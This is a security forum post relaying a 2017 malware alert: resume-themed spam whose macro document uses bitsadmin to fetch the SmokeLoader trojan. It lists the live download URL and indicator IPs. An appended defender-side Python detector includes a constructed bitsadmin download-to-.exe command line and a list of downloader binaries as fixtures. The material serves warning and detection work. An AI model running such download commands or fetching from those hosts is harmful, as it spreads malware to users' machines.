Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  #1 - AplusWebMaster (Adviser Team)
    Join Date: Oct 2005
    Location: USA
    Posts: 6,881

    Fake 'Website Job Application' SPAM, Office - malware delivery platform

    FYI...

    Fake 'Website Job Application' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/more-...erent-malware/
    20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/Sharik trojan...
    1] https://myonlinesecurity.co.uk/websi...be-ransomware/
    2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
    3] https://myonlinesecurity.co.uk/fake-...liver-malware/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...sume_eml-1.png

    Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
    http ://80.82.67.217/paddle.jpg which of course is -not- an image file but a renamed .exe (ASxas.exe)
    VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
    but Anyrun could not get anything despite leaving it running for 10 minutes...
    This word doc looks like this:
    > https://myonlinesecurity.co.uk/wp-co...sume_1_doc.png
    And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
    > https://myonlinesecurity.co.uk/wp-co...sume_2_doc.png
    ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/d...is/1513715092/
    Resume.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    4] https://www.virustotal.com/en/file/f...is/1513716371/
    paddle.jpg.exe

    5] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    37.59.55.60
    107.181.246.221

    Contacted Hosts
    139.59.208.246
    107.181.246.221
    188.165.214.95


    6] https://www.virustotal.com/en/file/9...d51c/analysis/
    bitcoinminer1

    80.82.67.217: https://www.virustotal.com/en/ip-add...7/information/
    > https://www.virustotal.com/en/url/f4...cbe9/analysis/
    ___

    Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
    ... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
    > https://www.computerworld.com/articl...fuscation.html
    Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
    (Much more detail at the computerworld URL above.)

    ADV170021 | Microsoft Office Defense in Depth Update
    - https://portal.msrc.microsoft.com/en...sory/ADV170021
    12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
    > https://docs.microsoft.com/en-us/sec...s/2017/4053440
    Updated: Dec 12, 2017

    >> https://www.askwoody.com/forums/topi...n/#post-153388
    Dec 20, 2017

    Last edited by AplusWebMaster; 2017-12-20 at 15:22.
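A defender-side example, added here and not part of the forum post or the blog it quotes: it flags the delivery chain described above (an Office process launching bitsadmin.exe, and a URL ending in an image extension being written to an .exe) in constructed Sysmon-style process-creation events, and checks whether a file served under an image name such as paddle.jpg actually starts with the PE "MZ" header. The event lines, host name, paths and file bytes are all constructed.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBIN_DOWNLOADERS = {"bitsadmin.exe", "powershell.exe", "certutil.exe", "mshta.exe"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}

# Constructed process-creation records in a Sysmon-like key=value shape (not real logs).
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\bitsadmin.exe ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE "
    r"CommandLine=bitsadmin /transfer upd /download /priority high http://[example-host]/paddle.jpg C:\Users\Public\ASxas.exe",
    r"Image=C:\Windows\System32\bitsadmin.exe ParentImage=C:\Windows\System32\svchost.exe "
    r"CommandLine=bitsadmin /list",
    r"Image=C:\Windows\System32\notepad.exe ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE "
    r"CommandLine=notepad.exe",
]

def parse_event(line):
    """Split 'Key=value' pairs; values may contain spaces but not another 'Key='."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_spawned_downloader(event):
    """True when an Office process launches a download-capable LOLBin (bitsadmin, PowerShell, ...)."""
    return (basename(event.get("ParentImage", "")) in OFFICE_PARENTS
            and basename(event.get("Image", "")) in LOLBIN_DOWNLOADERS)

def disguised_download(cmdline):
    """True when a URL with an image extension is saved under an executable name."""
    return re.search(r"https?://\S+\.(?:jpg|jpeg|png|gif)\b.*\.(?:exe|dll|scr)\b", cmdline, re.I) is not None

def flag_events(lines):
    """Return (image, reasons) for every event matching either rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = []
        if office_spawned_downloader(ev):
            reasons.append("office-parent-spawns-downloader")
        if disguised_download(ev.get("CommandLine", "")):
            reasons.append("image-url-saved-as-exe")
        if reasons:
            hits.append((basename(ev.get("Image", "")), reasons))
    return hits

def is_disguised_pe(filename, data):
    """True when a file claiming an image extension begins with the PE 'MZ' header."""
    return filename.rsplit(".", 1)[-1].lower() in IMAGE_EXTS and data[:2] == b"MZ"

# Constructed bytes: a PE stub delivered under an image name, and a genuine JPEG header.
FAKE_JPG = b"MZ\x90\x00" + b"\x00" * 60
REAL_JPG = b"\xff\xd8\xff\xe0" + b"\x00" * 60
```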
